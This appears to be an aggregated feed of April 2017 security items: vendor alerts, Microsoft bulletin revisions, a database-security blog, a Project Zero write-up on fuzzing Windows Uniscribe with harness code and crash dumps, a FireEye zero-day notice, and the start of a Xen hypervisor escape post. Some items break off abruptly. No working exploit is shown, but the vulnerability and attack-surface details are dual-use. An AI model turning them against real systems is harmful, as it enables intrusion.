This updated alert is a follow-up to the original alert titled ICS-ALERT-17-102-01A BrickerBot Permanent Denial-of-Service Attack that was published April 12, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of open-source reports of “BrickerBot” attacks, which exploit hard-coded passwords in IoT devices in order to cause a permanent denial of service (PDoS). This family of botnets, which consists of BrickerBot.1 and BrickerBot.2, was described in a Radware Attack Report.

MS17-014 – Important: Security Update for Microsoft Office (4013241) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): To comprehensively address CVE-2017-0027 for Office for Mac 2011 only, Microsoft is releasing security update 3212218. Microsoft recommends that customers running Office for Mac 2011 install update 3212218 to be fully protected from this vulnerability. See Microsoft Knowledge Base Article 3212218 for more information.
Summary: This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

MS17-021 – Important: Security Update for Windows DirectShow (4010318) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce that the security updates that apply to CVE-2017-0042 for Windows Server 2012 are now available. Customers running Windows Server 2012 should install update 4015548 (Security Only) or 4015551 (Monthly Rollup) to be fully protected from this vulnerability. Customers running other versions of Microsoft Windows do not need to take any further action.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow an Information Disclosure if Windows DirectShow opens specially crafted media content that is hosted on a malicious website. An attacker who successfully exploited the vulnerability could obtain information to further compromise a target system.

MS16-037 – Critical: Cumulative Security Update for Internet Explorer (3148531) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce the release of a new Internet Explorer cumulative update (4014661) for CVE-2016-0162. The update adds to the original release to comprehensively address CVE-2016-0162. Microsoft recommends that customers running the affected software install the security update to be fully protected from the vulnerability described in this bulletin. See Microsoft Knowledge Base Article 4014661 for more information.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on to say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.
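As a toy illustration of the idea, far simpler than any real masking product, consider replacing each digit of a sensitive field while keeping its shape, so downstream code still parses it:

import random
import re

def mask_digits(value: str) -> str:
    # Replace every digit with a random one, preserving the format, so
    # "123-45-6789" still looks like an SSN but carries no real data.
    return re.sub(r"\d", lambda _: str(random.randint(0, 9)), value)

print(mask_digits("123-45-6789"))  # e.g. "604-81-2377"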

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).
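To make the password point concrete, here is a minimal sketch of salted password hashing using only the Python standard library (the iteration count and algorithm are illustrative; real deployments should follow current guidance):

import hashlib
import hmac
import os

def hash_password(password: str) -> tuple[bytes, bytes]:
    # Per-user random salt plus a deliberately slow key-derivation function.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison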

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

Notes on Windows Uniscribe Fuzzing

Posted by Mateusz Jurczyk of Google Project Zero

Among the total of 119 vulnerabilities with CVEs fixed by Microsoft in the March Patch Tuesday a few weeks ago, there were 29 bugs reported by us in the font-handling code of the Uniscribe library. Admittedly the subject of font-related security has already been extensively discussed on this blog both in the context of manual analysis [1][2] and fuzzing [3][4]. However, what makes this effort a bit different from the previous ones is the fact that Uniscribe is a little-known user-mode component, which had not been widely recognized as a viable attack vector before, as opposed to the kernel-mode font implementations included in the win32k.sys and ATMFD.DLL drivers. In this post, we outline a brief history and description of Uniscribe, explain how we approached at-scale fuzzing of the library, and highlight some of the more interesting discoveries we have made so far. All the raw reports of the bugs we’re referring to (as they were submitted to Microsoft), together with the corresponding proof-of-concept samples, can be found in the official Project Zero bug tracker [5]. Enjoy!

Introduction

It was November 2016 when we started yet another iteration of our Windows font fuzzing job (whose architecture was thoroughly described in [4]). At that point, the kernel attack surface was mostly fuzz-clean with regards to the techniques we were using, but we still like to play with the configuration and input corpus from time to time to see if we can squeeze out any more bugs with the existing infrastructure. What we ended up with several days later was a bunch of samples which supposedly crashed the guest Windows system running inside of Bochs. When we fed them to our reproduction pipeline, none of the bugchecks occurred again, for unclear reasons. As disappointing as that was, there was also one interesting and unexpected result: for one of the test cases, the user-mode harness crashed itself, without bringing the whole OS down at the same time. This could indicate either that there was a bug in our code, or that there was some unanticipated font parsing going on in ring-3. When we started digging deeper, we found out that the unhandled exception took place in the following context:

(4464.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009
eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptPositionSingleGlyph+0x28533:
752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????

Until that moment, we didn’t fully realize that our tools were triggering any font-handling code beyond the well-known kernel implementation (despite some related bugs having been publicly fixed in the past, e.g. CVE-2016-7274 [6]). As a result, the fuzzing system was not prepared to catch user-mode faults, and thus any such crashes had remained completely undetected in favor of system bugchecks, which caused full machine restarts.

We quickly determined that the usp10.dll library corresponded to “Uniscribe Unicode script processor” (in Microsoft’s own words) [7]. It is a relatively large module (600-800 kB depending on system version and bitness) responsible for rendering Unicode-encoded text, as the name suggests. From a security perspective, it’s important that the code base dates back to Windows 2000, and includes a C++ implementation of the parsing of various complex TrueType/OpenType structures, in addition to what is already implemented in the kernel. The specific tables that Uniscribe touches on are primarily Advanced Typography Tables (“GDEF”, “GSUB”, “GPOS”, “BASE”, “JSTF”), but also “OS/2”, “cmap” and “maxp” to some extent. What’s equally significant is that the code can be reached simply by calling the DrawText [8] or other equivalent API with Unicode-encoded text and an attacker-controlled font. Since no special calls other than the typical ones are necessary to execute the most exposed areas of the library, it makes for a great attack vector in applications which use GDI to render text with fonts originating from untrusted sources. This is also evidenced by the stack trace of the original crash, and the fact that it occurred in a program which didn’t include any usp10-specific code:

0:000> kb
ChildEBP RetAddr
0026ec2c 09340ffc USP10!otlChainRuleSetTable::rule+0x13
0026eccc 0133d7d2 USP10!otlChainingLookup::apply+0x7d3
0026ed48 0026f09c USP10!ApplyLookup+0x261
0026ef4c 0026f078 USP10!ApplyFeatures+0x481
0026ef98 09342f40 USP10!SubstituteOtlGlyphs+0x1bf
0026efd4 0026f0b4 USP10!SubstituteOtlChars+0x220
0026f250 0026f370 USP10!HebrewEngineGetGlyphs+0x690
0026f310 0026f370 USP10!ShapingGetGlyphs+0x36a
0026f3fc 09316318 USP10!ShlShape+0x2ef
0026f440 09316318 USP10!ScriptShape+0x15f
0026f4a0 0026f520 USP10!RenderItemNoFallback+0xfa
0026f4cc 0026f520 USP10!RenderItemWithFallback+0x104
0026f4f0 09316124 USP10!RenderItem+0x22
0026f534 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0026f54c 0000000a USP10!ScriptStringAnalyse+0x284
0026f598 0000000a LPK!LpkStringAnalyse+0xe5
0026f694 00000000 LPK!LpkCharsetDraw+0x332
0026f6c8 00000000 LPK!LpkDrawTextEx+0x40
0026f708 00000000 USER32!DT_DrawStr+0x13c
0026f754 0026fa30 USER32!DT_GetLineBreak+0x78
0026f800 0000000a USER32!DrawTextExWorker+0x255
0026f824 ffffffff USER32!DrawTextExW+0x1e

As can be seen here, the Uniscribe functionality was invoked internally by user32.dll through the lpk.dll (Language Pack) library. As soon as we learned about this new attack vector, we jumped at the first chance to fuzz it. Most of the infrastructure was already in place, since both user- and kernel-mode font fuzzing share a large number of the pieces. The extra work that we had to do was mostly related to filtering the input corpus, fiddling with the mutator configuration, adjusting the system configuration and implementing logic for the detection of user-mode crashes (both in the test harness and Bochs instrumentation). All of these steps are discussed in detail below. After a few days, we had everything working as planned, and after another couple, there were already over 80 crashes at unique addresses waiting for triage. Below is a summary of the issues that were found in the first fuzzing run and reported to Microsoft in December 2016.
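Before moving on to the results, it is worth illustrating how little client code it takes to reach this attack surface. Here is a minimal sketch of a DrawText-based harness in Python/ctypes; the font path, face name and use of Hebrew text (to exercise the shaping path from the stack trace above) are illustrative choices, not Project Zero's actual harness:

import ctypes
from ctypes import wintypes

gdi32 = ctypes.WinDLL("gdi32")
user32 = ctypes.WinDLL("user32")
user32.GetDC.restype = ctypes.c_void_p
gdi32.CreateFontW.restype = ctypes.c_void_p
gdi32.SelectObject.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
user32.DrawTextW.argtypes = [ctypes.c_void_p, wintypes.LPCWSTR, ctypes.c_int,
                             ctypes.POINTER(wintypes.RECT), ctypes.c_uint]

# Load the attacker-controlled font privately for this process
# ("sample.ttf" and the face name below are hypothetical).
FR_PRIVATE = 0x10
gdi32.AddFontResourceExW("sample.ttf", FR_PRIVATE, None)

hdc = user32.GetDC(None)
hfont = gdi32.CreateFontW(-32, 0, 0, 0, 400, 0, 0, 0,
                          1, 0, 0, 0, 0,  # DEFAULT_CHARSET, default precision/quality
                          "Sample Face")
gdi32.SelectObject(hdc, hfont)

# Rendering Unicode text pulls usp10.dll in via lpk.dll, per the stack trace.
DT_NOCLIP = 0x100
rect = wintypes.RECT(0, 0, 512, 128)
user32.DrawTextW(hdc, "abc \u05d0\u05d1\u05d2", -1, ctypes.byref(rect), DT_NOCLIP)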

Results at a glance

Since ~80 was still a fairly manageable number of crashes to triage manually, we tried to reproduce each of them by hand, deduplicating them and writing down their details at the same time. When we finished, we ended up with 8 separate high-severity issues that could potentially allow remote code execution:

  • CVE-2017-0108: invalid write of n bytes (memcpy) in usp10!otlList::insertAt
  • CVE-2017-0084: invalid read / write of 2 bytes in usp10!AssignGlyphTypes
  • CVE-2017-0086: invalid write of n bytes (memset) in usp10!otlCacheManager::GlyphsSubstituted
  • CVE-2017-0087: invalid write of n bytes (memcpy) in usp10!MergeLigRecords
  • CVE-2017-0088: invalid write of 2 bytes in usp10!ttoGetTableData
  • CVE-2017-0089: invalid write of 2 bytes in usp10!UpdateGlyphFlags
  • CVE-2017-0090: invalid write of n bytes in usp10!BuildFSM and nearby functions
  • CVE-2017-0072: invalid write of n bytes in usp10!FillAlternatesList

All of the bugs but one were triggered through a standard DrawText call and resulted in heap memory corruption. The one exception was the #1030 issue, which resided in a documented Uniscribe-specific ScriptGetFontAlternateGlyphs API function. The routine is responsible for retrieving a list of alternate glyphs for a specified character, and the interesting fact about the bug is that it wasn’t a problem with operating on any internal structures. Instead, the function failed to honor the value of the cMaxAlternates argument, and could therefore write more output data to the pAlternateGlyphs buffer than was allowed by the function caller. This meant that the buffer overflow was not specific to any particular memory type – depending on what pointer the client passed in, the overflow would take place on the stack, heap or static memory. The exploitability of such a bug would greatly depend on the program design and compilation options used to build it. We must admit, however, that it is unclear what the real-world clients of the function are, and whether any of them would meet the requirements to become a viable attack target.

Furthermore, we extracted 27 unique crashes caused by invalid memory reads from non-NULL addresses, which could potentially lead to information disclosure of secrets stored in the process address space. Due to the large volume of these crashes, we were unable to analyze each of them in much detail or perform any advanced deduplication. Instead, we partitioned them by the top-level exception address, and filed all of them as a single entry #1031 in the bug tracker:

  1. usp10!otlMultiSubstLookup::apply+0xa8
  2. usp10!otlSingleSubstLookup::applyToSingleGlyph+0x98
  3. usp10!otlSingleSubstLookup::apply+0xa9
  4. usp10!otlMultiSubstLookup::getCoverageTable+0x2c
  5. usp10!otlMark2Array::mark2Anchor+0x18
  6. usp10!GetSubstGlyph+0x2e
  7. usp10!BuildTableCache+0x1ca
  8. usp10!otlMkMkPosLookup::apply+0x1b4
  9. usp10!otlLookupTable::markFilteringSet+0x1a
  10. usp10!otlSinglePosLookup::getCoverageTable+0x12
  11. usp10!BuildTableCache+0x1e7
  12. usp10!otlChainingLookup::getCoverageTable+0x15
  13. usp10!otlReverseChainingLookup::getCoverageTable+0x15
  14. usp10!otlLigCaretListTable::coverage+0x7
  15. usp10!otlMultiSubstLookup::apply+0x99
  16. usp10!otlTableCacheData::FindLookupList+0x9
  17. usp10!ttoGetTableData+0x4b4
  18. usp10!GetSubtableCoverage+0x1ab
  19. usp10!otlChainingLookup::apply+0x2d
  20. usp10!MergeLigRecords+0x132
  21. usp10!otlLookupTable::subTable+0x23
  22. usp10!GetMaxParameter+0x53
  23. usp10!ApplyLookup+0xc3
  24. usp10!ApplyLookupToSingleGlyph+0x6f
  25. usp10!ttoGetTableData+0x19f6
  26. usp10!otlExtensionLookup::extensionSubTable+0x1d
  27. usp10!ttoGetTableData+0x1a77

In the end, it turned out that these 27 crashes manifested 21 actual bugs, which were fixed by Microsoft as CVE-2017-0083, CVE-2017-0091, CVE-2017-0092 and CVE-2017-0111 to CVE-2017-0128 in the MS17-011 security bulletin.

Lastly, we also reported 7 unique NULL pointer dereference issues with no deadline, with the hope that having any of them fixed would potentially enable our fuzzer to discover other, more severe bugs. On March 17th, MSRC responded that they investigated the cases and concluded that they were low-severity DoS problems only, and would not be fixed as part of a security bulletin in the near future.

Input corpus, mutation configuration and adjusting the test harness

Gathering a solid corpus of input samples is arguably one of the most important parts of fuzzing preparation, especially if code coverage feedback is not involved, making it impossible for the corpus to gradually evolve into a more optimal form. We were lucky enough to already have had several font corpora at our disposal from previous fuzzing runs. We decided to use the same set of files that had helped us discover 18 Windows kernel bugs in the past (see the “Preparing the input corpus” section of [4]). It was originally generated by running a corpus distillation algorithm over a large number of fonts crawled off the web, using an instrumented build of the FreeType2 open-source library, and consisted of 14848 TrueType and 4659 OpenType files, for a total of 2.4G of disk space. In order to tailor the corpus better for Uniscribe, we reduced it to just the files that contained at least one of the “GDEF”, “GSUB”, “GPOS”, “BASE” or “JSTF” tables, which are parsed by the library. This left us with 3768 TrueType and 2520 OpenType fonts consuming 1.68G on disk, which were much more likely to expose bugs in Uniscribe than any of the removed ones. That was the final corpus that we worked with.
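
For reference, the table-directory check itself is trivial, because every sfnt-based font starts with a directory that lists all table tags. The following is a minimal sketch of such a filter (our own illustration, not the actual tool used for the distillation):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Big-endian 16-bit read: sfnt headers are big-endian. */
static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Returns 1 if the font contains at least one table parsed by Uniscribe. */
int has_layout_tables(FILE *f)
{
    static const char *wanted[] = { "GDEF", "GSUB", "GPOS", "BASE", "JSTF" };
    uint8_t hdr[12], rec[16];

    /* Offset table: sfntVersion(4) numTables(2) searchRange(2)
       entrySelector(2) rangeShift(2). */
    if (fread(hdr, 1, sizeof(hdr), f) != sizeof(hdr))
        return 0;
    uint16_t num_tables = be16(hdr + 4);

    /* Each table record: tag(4) checkSum(4) offset(4) length(4). */
    for (uint16_t i = 0; i < num_tables; i++) {
        if (fread(rec, 1, sizeof(rec), f) != sizeof(rec))
            return 0;
        for (size_t j = 0; j < sizeof(wanted) / sizeof(wanted[0]); j++)
            if (memcmp(rec, wanted[j], 4) == 0)
                return 1;
    }
    return 0;
}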

The mutator configuration was also pretty similar to what we did for the kernel: we used the same five standard bitflipping, byteflipping, chunkspew, special ints and binary arithmetic algorithms with the precalculated per-table mutation ratio ranges. The only change made specifically for Uniscribe was to add mutations for the “BASE” and “JSTF” tables, which were previously not accounted for.

Last but not least, we extended the functionality of the guest fuzzing harness, responsible for invoking the tested font-related APIs (mostly displaying all of the font's glyphs at various point sizes, but also querying a number of properties etc.). While it was clear that some of the relevant code was executed automatically through user32!DrawText with no modifications required, we wanted to maximize the coverage of Uniscribe code as much as possible. A full reference of all its externally available functions can be found on MSDN [9]. After skimming through the documentation, we added calls to ScriptCacheGetHeight, ScriptGetFontProperties, ScriptGetCMap, ScriptGetFontAlternateGlyphs, ScriptSubstituteSingleGlyph and ScriptFreeCache. This quickly proved to be a successful idea, as it allowed us to discover the aforementioned generic bug in ScriptGetFontAlternateGlyphs. Furthermore, we decided to remove invocations of the GetKerningPairs and GetGlyphOutline API functions, as their corresponding logic is located in the kernel, while our focus had now shifted strictly to user mode. As such, they wouldn't lead to the discovery of any new bugs in Uniscribe, but would instead slow the overall fuzzing process down. Apart from these minor modifications, the core of the test harness remained unchanged.

By taking the measures listed above, we hoped to trigger most of the low-hanging fruit bugs. With this in place, the only part left was to make sure that the crashes would be reliably caught and reported to the fuzzer. This subject is discussed in the next section.

Crash detection

The first step we took to detect Uniscribe crashes effectively was disabling the Special Pool for win32k.sys and ATMFD.DLL (which caused unnecessary overhead for no gain in user-mode fuzzing), while enabling the PageHeap option in Application Verifier for the harness process. This was done to improve our chances of detecting invalid memory accesses, and to make reproduction and deduplication more reliable.

Thanks to the fact that the fuzz-tested code in usp10.dll executed in the same context as the rest of the harness logic, we didn’t have to write a full-fledged Windows debugger to supervise another process. Instead, we just set up a top-level exception handler with the SetUnhandledExceptionFilter function, which then got called every time a fatal exception was generated in the process. The handler’s job was to send out the state of the crashing CPU context (passed in through ExceptionInfo->ContextRecord) to the hypervisor (i.e. the Bochs instrumentation) through the “debug print” hypercall, and then actually report that the crash occurred at the specific address.
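
In code, the whole crash-reporting setup can be as small as the sketch below. The two hypercall wrappers are hypothetical stand-ins for the interface exposed by our Bochs instrumentation, which is not any public API:

#include <windows.h>

/* Hypothetical wrappers around the instrumentation's hypercalls. */
void DebugPrintToHypervisor(const CONTEXT *ctx);          /* "debug print" */
void ReportCrashToHypervisor(ULONG_PTR exceptionAddress); /* crash report */

static LONG WINAPI TopLevelFilter(EXCEPTION_POINTERS *ExceptionInfo)
{
    /* Ship the crashing CPU context out of the guest first... */
    DebugPrintToHypervisor(ExceptionInfo->ContextRecord);
    /* ...then report the faulting address for deduplication. */
    ReportCrashToHypervisor(
        (ULONG_PTR)ExceptionInfo->ExceptionRecord->ExceptionAddress);
    return EXCEPTION_EXECUTE_HANDLER;  /* let the process terminate */
}

int main(void)
{
    SetUnhandledExceptionFilter(TopLevelFilter);
    /* ... load mutated font, call DrawText and the Uniscribe APIs ... */
    return 0;
}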

In the kernel font fuzzing scenario, crashes were detected by the Bochs instrumentation with the BX_INSTR_RESET instrumentation callback. This approach worked because the guest system was configured to automatically reboot on bugcheck, consequently triggering the bx_instr_reset handler. The easiest way to integrate this approach with user-mode fuzzing would therefore have been to just add an ExitWindowsEx call in the epilogue of the exception handler, making everything work out of the box without even touching the existing Bochs instrumentation. However, that method would have lost information about the crash location, making automated deduplication impossible. In order to address this problem, we introduced a new "crash encountered" hypercall, which receives the address of the faulting instruction as an argument from the guest, and passes this information further down our scalable fuzzing infrastructure. Having the crashes grouped by exception address right from the start saved us a ton of postprocessing time, and limited the number of test cases we had to look at to a bare minimum.

This concludes the list of differences between the Windows kernel font fuzzing setup we have been using for nearly two years now and the equivalent user-mode setup that we built only a few months ago, but which has already proven very effective. Everything else has remained the same as described in the "font fuzzing techniques" article from last year [4].

Conclusions

It is a fascinating but dire realization that even for such a well-known class of bug hunting targets as font parsing implementations, it is still possible to discover new attack vectors that date back to the previous century, have remained largely unaudited until now, and are just as exposed as the interfaces we already know about. We believe this is a great example of how gradually raising the bar for a variety of software can have much more impact than trying to kill every last bug in a narrow range of code. It also illustrates that time spent thoroughly analyzing the attack surface and looking for little-known targets can turn out to be very fruitful, as the security community still doesn't have a full understanding of the attack vectors in every important data processing stack (such as Windows font handling in this case).

This effort and its results show that fuzzing is a very universal technique, and that most of its components can be easily reused from one target to another, especially within the scope of a single file format. Finally, it has proven that it is possible to fuzz not just the Windows kernel but also regular user-mode code, regardless of the host system's environment (which was Linux in our case). While the Bochs x86 emulator incurs a significant overhead compared to native execution speed, this can often be offset by scaling the fuzzing out across many instances, still achieving a net gain in the number of iterations per second. As an interesting fact, issues #993 (Windows kernel registry hive loading), #1042 (EMF+ processing in GDI+), #1052 and #1054 (color profile processing) fixed in the last Patch Tuesday were also found by fuzzing Windows on Bochs, but with slightly different input samples, test harnesses and mutation strategies. :)

References

  1. The “One font vulnerability to rule them all” series starting with https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html
  2. https://msdn.microsoft.com/pl-pl/library/windows/desktop/dd374093(v=vs.85).aspx

Fight firewall sprawl with AlgoSec, Tufin, Skybox suites

New and innovative security tools seem to be emerging all the time, but the frontline defense for just about every network in operation today remains the trusty firewall. They aren’t perfect, but if configured correctly and working as intended, firewalls can do a solid job of blocking threats from entering a network, while restricting unauthorized traffic from leaving.

The problem network administrators face is that as their networks grow, so does the number of firewalls. Large enterprises can find themselves with hundreds or thousands of them -- a mix of old, new and next-gen models, probably from multiple vendors -- sometimes accidentally working against each other. For admins trying to configure firewall rules, the task can quickly become unmanageable.


Acknowledgement of Attacks Leveraging Microsoft Zero-Day

FireEye recently detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating for several weeks on a public disclosure timed with the release of a patch by Microsoft to address the vulnerability. After a recent public disclosure by another company, this blog post serves to acknowledge FireEye's awareness and coverage of these attacks.

FireEye email and network solutions detect the malicious documents as: Malware.Binary.Rtf.

Attack Scenario

The attack involves a threat actor emailing the targeted user a Microsoft Word document that contains an embedded OLE2link object. When the user opens the document, winword.exe issues an HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.

The vulnerability bypasses most mitigations; however, as noted above, FireEye email and network products detect the malicious documents. Microsoft Office users are advised to apply the patch as soon as it is available.

Acknowledgements

FLARE Team, FireEye Labs Team, FireEye iSIGHT Intelligence, and Microsoft Security Response Center (MSRC).

Pandavirtualization: Exploiting the Xen hypervisor

Posted by Jann Horn, Project Zero

On 2017-03-14, I reported a bug to Xen's security team that permits an attacker with control over the kernel of a paravirtualized x86-64 Xen guest to break out of the hypervisor and gain full control over the machine's physical memory. The Xen Project publicly released an advisory and a patch for this issue on 2017-04-04.

To demonstrate the impact of the issue, I created an exploit that, when executed in one 64-bit PV guest with root privileges, will execute a shell command as root in all other 64-bit PV guests (including dom0) on the same physical machine.

Background

access_ok()

On x86-64, Xen PV guests share the virtual address space with the hypervisor. The coarse memory layout looks as follows:

[figure: guest userspace occupies the lower (positive) half of the 48-bit address space, the Xen-reserved area sits at the bottom of the upper half, and the guest kernel area lies above it]

Xen allows the guest kernel to perform hypercalls, which are essentially normal system calls from the guest kernel to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, with up to six arguments passed in registers. Like normal syscalls, Xen hypercalls often take guest pointers as arguments. Because the hypervisor shares its address space, it makes sense for guests to simply pass in guest-virtual pointers.
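
As an illustration, a two-argument hypercall issued from a 64-bit PV guest kernel boils down to something like the sketch below (in practice guests jump through the hypercall page that Xen provides, but each of its entries essentially performs the same sequence):

#include <stdint.h>

#define __HYPERVISOR_memory_op 12  /* hypercall number, xen/include/public/xen.h */

/* Hypercall number in rax, arguments in rdi/rsi (then rdx, r10, r8, r9);
   the syscall instruction clobbers rcx and r11. */
static inline long hypercall2(unsigned long nr, unsigned long a1,
                              unsigned long a2)
{
    long ret;
    register unsigned long _a1 asm("rdi") = a1;
    register unsigned long _a2 asm("rsi") = a2;
    asm volatile("syscall"
                 : "=a"(ret), "+r"(_a1), "+r"(_a2)
                 : "a"(nr)
                 : "rcx", "r11", "memory");
    return ret;
}

/* e.g. hypercall2(__HYPERVISOR_memory_op, XENMEM_exchange, (unsigned long)&exch); */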

Like any kernel, Xen has to ensure that guest-virtual pointers don't actually point to hypervisor-owned memory before dereferencing them. It does this using userspace accessors that are similar to those in the Linux kernel; for example:

  • access_ok(addr, size) for checking whether a guest-supplied virtual memory range is safe to access - in other words, it checks that accessing the memory range will not modify hypervisor memory
  • __copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd without checking whether hnd is safe
  • copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole memory range from addr to addr+size-1 is safe to access, using any memory access pattern. However, Xen's access_ok() doesn't guarantee that much:

/*
* Valid if in +ve half of 48-bit address space, or above Xen-reserved area.
* This is also valid for range checks (addr, addr+size). As long as the
* start address is outside the Xen-reserved area then we will access a
